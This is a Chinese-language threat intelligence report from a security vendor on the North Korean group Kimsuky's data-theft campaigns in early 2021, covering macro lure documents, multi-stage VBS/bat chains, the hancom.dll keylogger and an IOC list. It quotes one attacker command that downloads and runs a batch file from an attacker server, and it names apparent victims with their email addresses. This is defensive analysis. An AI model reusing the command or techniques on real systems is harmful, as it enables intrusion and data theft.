Kimsuky2021年上半年窃密活动总结

原创高级威胁研究院 360威胁情报中心

Kimsuky 是位于朝鲜的APT组织,又名(Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom)等，最早由kaspersky在2013年披露，该组织长期针对于韩国的智囊团、政府外交、新闻组织、教育学术等机构进行攻击,在过去几年里，他们将攻击目标扩大到包括美国、俄罗斯和欧洲在内的国家。主要目的为窃取情报、间谍活动等。该组织十分活跃，常用的攻击载荷为带有漏洞的hwp文件,恶意宏文件,释放载荷的PE文件等。

纵观2021上半年Kimsuky的活动，攻击目标仍以韩国的政府外交、国防军工、大学教授、智囊团为主。相关攻击活动仍以鱼叉邮件投递诱饵文档为主，同时也在积极利用社会热点事件为诱饵进行攻击。

收集信息类诱饵文档

2021上半年Kimsuky使用次数最多的诱饵文档最终目的多数以收集信息为主，我们根据攻击流程将诱饵文档大致分为五类:

类别

方式

时间

第一类

直接窃取上传：

直接在VBA代码中收集基本信息上传

2020年11月-2020年3月：

问卷调查类文档为主

第二类

执行powershell脚本窃取上传：

VBA代码使用简单字符串作混淆，去混淆后使用powershell.exe 执行后续脚本，功能为收集基本计算机信息上传

2020年6月-今：

社会时事热点为主

第三类

通过xml窃取信息：

去混淆的数据写入到本机模板目录下的xml文件执行，执行的内容为向远程地址请求数据执行

2020年12月-今

今年使用最多：

拜登政府政策、党军事题材为主

第四类

通过Google博客窃取信息：

释放 desktop.ini 文件，链接到Google博客下载恶意脚本收集信息上传

2021年6月-今，使用的新的手法：

使用Google博客存放恶意脚本代码，以会议类、问卷类诱饵为主

第五类

通过Onedrive网盘窃取信息：

释放version.dll解密脚本后，从Onedrive网盘获取后续载荷，后续载荷最终执行窃取信息的操作

2020年12月-今：

今年使用最少：

测试文档为主

第一类

第一类诱饵主要以问卷调查类文档为主，VBA中CC等关键字符串均使用base64编码，当用户启用宏后便收集计算机基本信息附在url后上传，第一类攻击中CC具有相同的格式：" php?= 收集的信息 "

收集的信息如下，其中w标识对应着who,我们猜测这应该是受害者代号，在网络中可能对应着twitter等社交账号名称、邮箱账号名称等。

参数	信息
w=	硬编码的 "chosh3"、"caerang"、"sakim“、"ksskorea”等
x64=	"C:\\Program Files"目录信息
x86=	"C:\\Program Files (x86)\\"目录信息
r=	文件历史记录信息
msv=	Office 版本信息
un=	用户名
os=	系统版本信息
sv=	系统版本号信息

通过对参数“who”信息的关联我们在Twitter上搜索到具体的人，我们由此猜测这些名称可能对应着历史攻击的受害者。

图：韩国退休外交官、研究员

第二类

第二类文档更多的以当前时事热点事件为诱饵，VBA代码使用 "+e+z+" 等字符串做简单混淆，去混淆后的vba使用powershell.exe 链接CC执行后续脚本

下载的后续脚本功能为收集计算机信息，保存到\AppData\Roaming\Ahnlab\Ahnlab.hwp，并上传至服务器，随后从远程服务器接收数据执行，由于地址已经无法访问，因此暂时无法确认后续操作。

第三类

远程模板注入类文档

第三类文档多以拜登政府政策、党军事题材为诱饵，在这个阶段我们发现了一些模板文件，并与一些远程模板注入的诱饵文档做了关联，这一阶段宏文件中链接的url具有相同的格式 "php?query=1",模板下载地址也具有相同的格式"tmp?q=6" 。

这一类的文档，当用户启用宏后，vba代码将会把自身去混淆的数据保存为模板目录 %AppData%\Roaming\Microsoft\Templates 下的xml文件执行

执行的链接均已失效，不过我们猜测这一阶段的行为仍以收集信息为主，也有可能是下载其它的后门执行

第四类

第四类的诱饵文档重用了之前诱饵文档（d7b717134358bbeefc5796b5912369f0）的内容，但却采用了一种新的方式存储恶意脚本：将攻击代码保存到个人博客中，当然也不排除为攻击者测试使用。

这一阶段当受害者启用宏后，VBA代码将base编码的数据保存到 AppData\Roaming目录下的 desktop.ini 执行，同时在启动目录创建了名为 iexplore.exe.lnk的快捷方式，目标指向 \Microsoft\desktop.ini，以实现持久化。

desktop.ini 功能为从 hxxps:// smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html 请求数据解码执行

请求数据的地址为一个博客，截至我们发现的时候共有三篇文章6.6日上传两篇，6.3日上传一篇,三篇内容区别不大，C2相同。功能均为窃取信息上传

博客创建者为 BrightWorld，创建日期为今年6月：

请求的博客内容经过解码后功能主要为收集计算机信息上传。

首先检查 %APPDATA% 目录中是否有文件 gi.exe ,有的话结束运行，没有的话写入标记 "gi"继续运行，防止重复运行，接着将注册表 VBAWarnings 的值修改为1 ，以启用所有宏，然后收集以下信息上传

收集的用户信息：

参数	信息
r	最近访问记录
un	用户名
os	系统版本
sv	系统版本号信息
dnv	net framework 版本信息
msv	office版本信息
dll	桌面目录信息
tll	任务栏快捷方式

收集的用户信息格式与历史Kimsuky活动存在多处相似之处：

根据关联此次文档的作者信息 "Naeil_영문시작"可以关联到更多Kimsuky组织的历史诱饵，结合以上信息来看，基本确定此次活动为Kimsuky所为。

另外我们根据博客中存放恶意脚本的文章标题 "donavyk"、"dootakim" 关联到了两个可能相关的人，均为韩国教授，研究方向均为韩国军事、核问题等，使用的均为韩国邮箱 hanmail，和Kimsuky第一阶段的 “who”字段功能类似，我们猜测这次活动有两种可能，攻击者测试用，或者为攻击者定向攻击。

article_name	name	mail	方向	身份
donavyk	金东烨	donavyk@hanmail.net / donavyk@gmail.com	朝鲜军事、核问题	庆南大学远东研究所教授/朝鲜研究会理事
dootakim	金妍哲	dootakim@hanmail.net	朝鲜局势、军事、核问题等	韩国研究院院长/仁济大学统一学部教授

article_name

name

mail

方向

身份

donavyk

金东烨

donavyk@hanmail.net /

donavyk@gmail.com

朝鲜军事、核问题

庆南大学远东研究所教授/朝鲜研究会理事

dootakim

金妍哲

dootakim@hanmail.net

朝鲜局势、军事、核问题等

韩国研究院院长/仁济大学统一学部教授

在其它的的活动中，Kimsuky使用Onedrive 等网盘作为中转服务器，这次行动使用个人博客作为中转服务器，可以看出Kimsuky越来越倾向于使用第三方服务器来存储恶意代码，并使用越来越复杂的方式来逃避安全检测。

第五类: 新的诱饵文档测试活动

今年我们还发布了 "Kimsuky组织网络攻击活动追溯分析报告"披露了一批Kimsuky网络攻击武器与测试样本,5月份我们又发现了一起相关的攻击测试活动。

此次攻击从一个诱饵文档开始，当受害者启用文档的宏后，后续载荷将通过OneDrive云盘和被黑网下发恶意荷载，并动态执行控制命令和恶意VBS脚本收集用户信息。

攻击仍从一个文档开始，当用户点击文档启用宏后将会链接远程服务器下载文件保存为：%UserProfile%\AppData\Local\Microsoft\OneDrive\version.dll

version.dll：

下载的 version.dll 将从自身释放出下一阶段的脚本 6C1E.vbs并执行

这次活动 version.dll 和上次我们披露的活动对比，增加了对窗口类 “49B46336-BA4D-4905-9824-D282F05F6576” 的检测，找到之后也只是做了隐藏的处理，并没有结束操作。这个窗口类属于韩国安全软件AhnLab-V3 的窗口类名，这个类名在以往GoldDragon的活动中也经常使用。

6C1E.vbs：

version.dll 释放的下一阶段脚本为 6C1E.vbs ，去混淆后功能为向 Onedrive 请求数据在内存解密执行

Onedrive中的数据

mac11_ver.txt：

解密后的脚本(内存执行的mac11_ver.txt)，获取当前用户名，如果当前用户名不为 lisa、wmbbr、pl.pelletier 的话就将当前用户名与 https:// worldinfocontact[.]club/111/mac3[.]php?na=用户名拼接并发送到服务器。猜测作者这里再利用用户名为这些的机器做测试。

如果是的话则在 C:\Users\Ppp\AppData\Roaming目录创建sched.his 文件并写入 111 。然后使用命令 "cmd.exe /c curl -o \"%appdata%\\aqz.bat\" https:// worldinfocontact[.]club/111/bill/cow[.]php?op=1drop[.]bat

& timeout 5 & \"%appdata%\\aqz.bat\"" 下载下一阶段的载荷aqz.bat并执行。

aqz.bat：

这一阶段执行的为 bat 脚本，功能为读取 %appdata%目录下的desktop.tmp解密执行，如果不存在，则从地址 https:// worldinfocontact[.]club/111/bill/expres[.]php?op=2获取数据，并保存为desktop.tmp执行。同时创建计划任务执行 sys.vbs，使用的解密算法与我们之前披露的活动一致。

最后一阶段的脚本desktop.tmp主要功能依然为窃取计算机基本信息

观察到的第二种攻击测试活动，为使用恶意的Normal.dotm替换 Office模版，执行恶意宏代码，测试者启动了 CM_College_interview1.docm(大学面试)文档后，执行了从远程链接下载并替换模板的行为。

模板中的恶意宏内容，将从 http:// nuclearpolicy101[.]org/wp-admin/includes/0421/d[.]php?na=vbtmp 获取数据保存为 qwer.gif，截至到我们分析，攻击者已经撤销了原有的内容

这次的攻击测试活动和我们上次报告中提到的流程区别并不大，可以看出Kimsuky的攻击非常喜欢第三方云盘和和被黑网站作为攻击基础设施，并且善于使用各种脚本如vbs、bat等组成的攻击链。

Hancom.dll

今年三月份，我们捕获到了一批Gold Dragon活动的样本，样本伪装成韩办公软件Hancom Office 组件hancon.dll。由于样本被批量上传至平台,并有很多不同的加壳版本，我们猜测这批样本可能为攻击者测试使用,经过我们对hancom.dll 的溯源关联，我们又关联到了较新的一批hancom.dll组件。

简述

攻击仍从一个文档开始，当受害者打开诱饵文档并启用宏后，vba代码将从远程链接下载解压并执行第一阶段的loader，loader下载释放hancom.dll后调用其导出函数执行，随后收集信息至PI_000.dat、PI_001.dat，然后从自身解密数据，创建傀儡进程svchost.exe注入执行，这一步将收集的键盘记录信息并将收集的信息进行加密，随后再次从自身解密数据，注入到傀儡进程iexplorer.exe执行，这一步将登录被盗的daum邮箱，通过文件映射,将加密的数据通过邮件的方式发送给攻击者。

分析

以此次我们捕获的一个疑似远程模板注入的文档为例进行分析，即(71e480edcb51a02b8460ccc9b2dfa272) 。

文档的VBA 代码从 http:// kr2959[.]atwebpages[.]com/view.php?id=2 下载数据保存为 C:\Users\Public\cvwiq.zip (7f8a4e0dca2e18121af505d9198d81d1)。

解压后调用其导出Run执行，解压后的dll(72d43ff8f9ee0819e96ed7fd7d9a551a)。

解压后的dll为一个loader，功能集中在导出函数“Start”中，导出函数中的 Run的功能为执行自身的导出函数 "Start"，主要功能为从远程下载解压hancom.dll执行。

Start 函数开始，将创建一个线程持续的寻找韩杀软 V3.exe 的窗口类名 “49B46336-BA4D-4905-9824-D282F05F6576”，找到之后将窗口关闭。

然后向 http:// kr2959[.]atwebpages[.]com/view[.]php?id=21504 请求数据，截至分析时链接已经失效，根据流程来看请求的数据是一个参数, 将参数与之前的url拼接后再次获取新的数据，第二次获取的数据根据流程来看应该是一个压缩文件

将从服务器下发的gzip文件解压后，调用其导出init执行，然后写入脚本结束本进程，并删除自身。

我们通过URL 关联到了此次下发的压缩文件523b3401b0fb0e8aec9be70f57686840,解压后的样本使用VMP压缩,使用360安全大脑沙箱云运行样本获取行为后，我们发现此次样本和我们历史捕获的hancom.dll行为基本一致。

因行为基本相同，这里使用历史无加密壳的hancom.dll样本进行后续分析：e69294040dab044805c9d7c47fef4844 。

Hancom.dll多数具有相同的导出函数 "RUN",主要功能也集中在此函数。

样本开始执行时创建一个线程来遍历当前窗口寻找” 49B46336-BA4D-4905-9824-D282F05F6576”,这个类名是韩国安全公司ahnlab旗下杀软 v3lite的窗口类名。

当找到时疑似发送了模拟击键信息。

随后将自身添加到注册表RUN项实现持久化，并结束daumcleaner.exe(Daum工具所对应的某个进程,该进程可以阻止恶意代码，这是韩国独有的一款工具），结束daumcleaner.exe的操作在以往的Gold Dragon活动中也多次出现。

收集基本计算机信息如文档信息、网络信息、进程信息等到目录 PI_000.dat 这个目录在历史的Gold Dragon活动已经使用多次了。

收集信息后将从自身解密数据注入到 svchost.exe 进程执行，执行的功能为收集当前窗口信息，键盘记录信息至C:\Users\user\AppData\Roaming\Microsoft\pub\tader.wav

并判断机器的3389端口是否打开，如果未打开则从服务器 klsa[.]onlinewebshop.net获取数据执行。

对于攻击者为什么会根据3389是否打开而去下载后续载荷的操作我们暂不清楚，不过这个功能在更新版本的hancom组件中已经去除了。

随后将之前获取到的信息进行加密，并再次从自身解密数据,并注入到ie执行，注入到ie执行的代码主要功能为上传之前加密的信息，并且使用了一种新的方式即使用邮箱传递信息，即登录被盗的邮箱applebox31@daum.net将加密的数据发送至：flower9801@hanmail.net。

在受害者的收件箱中我们发现了一些Kimsuky历史活动的攻击，我们有理由猜测该组织前期先通过钓鱼邮件攻击，获取用户邮箱的账号密码，然后在利用受害者邮箱中转其它受害用户的信息。

下图为受害者的发件箱，可以发现hancom组件已经投入使用，并且攻击在持续进行中，最近的一次向攻击者(flower9801@hanmail.net)发送用户加密数据的时间为 2021.6.29日。

‍‍

关联
‍‍

此次发现的hancom组件与历史GoldDragon有诸多相似之处，在历史的GoldDragon活动中就有使用导出函数Run的情况。

历史活动中在导出函数Run中执行相应功能，新的版本是在注入傀儡进程svchost.exe执行相应功能，新版本将代码注入进傀儡进程执行窃取信息的操作比老版本更加隐蔽。

相同的收集信息流程：

Kimsuky 作为朝鲜 APT 组织之一，攻击活动十分频繁，擅长使用社会热点事件作为诱饵，攻击目标主要针对韩国的政府外交、国防统一、企业大学等。

基础设施方面擅长以第三方云盘、个人博客、个人邮箱、被黑网站作为中转服务器或者攻击基础设施，并且善于使用各种脚本如vbs、bat等组成的攻击链。近些年来也在不断地更新开发新的工具，360高级威胁研究院会对相关攻击活动持续进行跟踪，及时发现安全威胁并快速响应处置。

附录 IOC

一类诱饵:
d7b717134358bbeefc5796b5912369f0
6a614ca002c5b3a4d7023faffc0546e1
bce51419fae8acbeff3149ca53f8baad
49a04c85555b35f998b1787b325526e6
c9f23b6ee1ba97c753892e6c103521d6
5b2355014f72dc2714dc5a5f04fe9519
8ca84c206fe8436dcc92bf6c1f7cf168
d725efd437d26e01e3b64e722929c01e
0d36f4f5a1f7bc7d89fbda02be7c2336
86c462b8ceffbc10018df2c32e024b29
208a3b4565d3041d09448a23a80edf1c

http://connectter[.]atwebpages[.]com/2612/download[.]php?
http://majar[.]medianewsonline[.]com/0812/1[.]php?
http://majar[.]medianewsonline[.]com/0812/1[.]php?
http://eucie09111[.]myartsonline[.]com/0502/v[.]php?
http://hanlight[.]mygamesonline[.]org/2403/v[.]php?
http://ftcpark59[.]getenjoyment[.]net/1703/v[.]php?

二类诱饵:
dfbe17d9dfa3f3bb715e1d8348bd1f50
dc5fa08c7e2bb959042f5572c91ada5e
1269e2b00fd323a7748215124cb058cd
9d3b4e82d2c839ffc2887946fb204615
5973ba270e9b5ea57c138245ffc39552
af3288ed7853865d562ccd1f48fa4a16
199674e87f437bdbd68884b155346d25

http://manct[.]atwebpages[.]com/ck/uy[.]txt
http://fabre[.]myartsonline[.]com/ys/ha[.]txt
http://rukagu[.]mypressonline[.]com/le/yj[.]txt
http://quarez[.]atwebpages[.]com/ny/ui[.]txt
http://quarez[.]atwebpages[.]com/ny/post[.]php
http://quarez[.]atwebpages[.]com/ds/le[.]txt
http://waels[.]onlinewebshop[.]net/st/wa[.]txt
http://pootball[.]medianewsonline[.]com/ro/ki[.]txt

三类诱饵:

04a0505cc45d2dac4be9387768efcb7c
d3a317dd167cfa77c976fa9c86c24982
d8e817abd5ad765bf7acec5d672cbb8d
4886f89546c422f5e04c2da33090a201
0a68d6a3d0aa9c5a3a4485d314ea8372
c6437d685f4a489c867b4d2b68f07f1a
36ad6b5775ac550a36f56467051d2c03
ec3f771c71a24c165697e26e136daa4a
9ee9dacd6703c74e959a70a18ebb3875
1670bb091dba017606ea5e763072d45f
21b72a6ed58db07a7f7c16372c3422e2
41aba3f7a154fb209beba0e36e6ef3ab
68a1cc84de7d5802b7251786a8a5da0c
a9b6cf8d8d0a67da4eea269dab16fe99
fe4dd316363d3631c83c2995dd3775f4

http://yanggucam[.]designsoup[.]co[.]kr/user/views/board/skin/secret/css/list[.]php?query=1

http://samsoding[.]homm7[.]gethompy[.]com/plugins/dropzone/min/css/list[.]php?query=1

http://www[.]mechapia[.]com/_admin/nicerlnm/web/style/list[.]php?query=1

http://miracle[.]designsoup[.]co[.]kr/user/views/resort/controller/css/update/list[.]php?query=1

http://cwda[.]co[.]kr/theme/basic/skin/new/basic/update/list[.]php?query=1

http://cwda[.]co[.]kr/theme/basic/skin/new/basic/update/Normal[.]dotm?q=6

http://heritage2020[.]cafe24[.]com/plugin/kcpcert/bin/list[.]php?query=1

http://www[.]inonix[.]co[.]kr/kor/page/product/_notes/list[.]php?query=1

http://www[.]inonix[.]co[.]kr/kor/page/product/_notes/tmp/?q=6

http://beilksa[.]scienceontheweb[.]net/cookie/select/log/list[.]php?query=1

http://beilksa[.]scienceontheweb[.]net/cookie/select/log/tmp?q=6

http://www[.]inonix[.]co[.]kr/kor/board/widgets/mcontent/skins/tmp?q=6

http://koreacit[.]co[.]kr/skin/new/basic/update/temp?q=6

https://reform-ouen[.]com/wp-includes/css/dist/nux/dotm/dwn[.]php?id=0119

http://www[.]anpcb[.]co[.]kr/plugin/sns/facebook/src/update/normal[.]dotm?q=6

http://beilksa[.]scienceontheweb[.]net/cookie/select/log/tmp?q=6

四类诱饵:
0821884168a644f3c27176a52763acc9
95c92bcfc39ceafc1735f190a575c60c

http://wbg0909[.]scienceontheweb[.]net/0412/download[.]php?
https://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html
http://alyssalove[.]getenjoyment[.]net/0423/v[.]php?

五类诱饵:新的诱饵文档测试活动:
e3e40b3eaefeb0c63dd449087a8988ef
FE3AD944D07B66C83DC433C39FC054F4
D79C92CC5AB70B61B2E174256577EA3A
9E0B68D23D36A6D276BA204BD8377120
12047FD5EF345CE53C92324357BDFFBE
27EE7CF37FFFFF7809E806F2462AEB00
FA935505E2A9A7DE6380AB9447D07D2C

https://1ive[.]me/ww/mac/0526_sim/d[.]php?na=version[.]gif
https://onedrive[.]live[.]com/?authkey=%21APtP1%2DAyXU4q3Gg&cid=EA63197CF6E2BF62&id=EA63197CF6E2BF62%21171&parId=root&o=OneUp
https://worldinfocontact[.]club/111/mac3[.]php?na="username"
https://worldinfocontact[.]club/111/bill/cow[.]php?op=1drop[.]bat
https://worldinfocontact[.]club/111/bill/expres[.]php?op=2
http://nuclearpolicy101[.]org/wp-admin/includes/0421/d[.]php?na=dot[.]gif
http://nuclearpolicy101[.]org/wp-admin/includes/0421/d[.]php?na=vbtmp

hancom

15ec5c7125e6c74f740d6fc3376c130d

3ecc65085a91044a119abce4f0c0d4de

ec19cd77170b6ac8772c5799fdd88852

11ac8609d64e5a5ade83eff92e4f1314

1d30dfa5d8f21d1465409b207115ded6

37e4865de72c3169d591e16ef8823676

e69294040dab044805c9d7c47fef4844

cf5815a1f635dca148ccffeb074b64d5

c9dae2b42f0b28631dc314a74fa2177f

0629fd238259d7df7aa22ca82ac6b93e

425f291cbaee9b44214057642db271a5

0e998937644007904f27a1eaffe32df5

7a67b8c387f24b782e46601634165681

6ec77913e6a359ee4e62909e28c08f1d

2399df3a222032c188a22df52a49384a

d73239230625afd2d9fa6cce1c6c022c

4a139f6888790f059ff5e19056ca5664

71e480edcb51a02b8460ccc9b2dfa272(doc)

72d43ff8f9ee0819e96ed7fd7d9a551a(wieb.dat)

7f8a4e0dca2e18121af505d9198d81d1(cvwiq.zip)

523b3401b0fb0e8aec9be70f57686840(hancom_vmp_zip)

4a139f6888790f059ff5e19056ca5664(hancom_vmp)

http://kr2959[.]atwebpages[.]com/view.php?id=2

http://kr2959[.]atwebpages[.]com/view[.]php?id=21504

klsa[.]onlinewebshop.net

攻击者邮箱：

flower9801@hanmail.net

可能为被盗邮箱/ID：

nk_biz_forum

applebox31@daum.net

daeknmoon@daum.net

shin.kyungjin@daum.net

团队介绍

TEAM INTRODUCTION

360高级威胁研究院

360高级威胁研究院是360政企安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。

继续滑动看下一个

Kimsuky2021年上半年窃密活动总结

第二类

第三类

第四类

第五类: 新的诱饵文档测试活动

简述

分析

‍‍关联‍‍

‍‍

关联
‍‍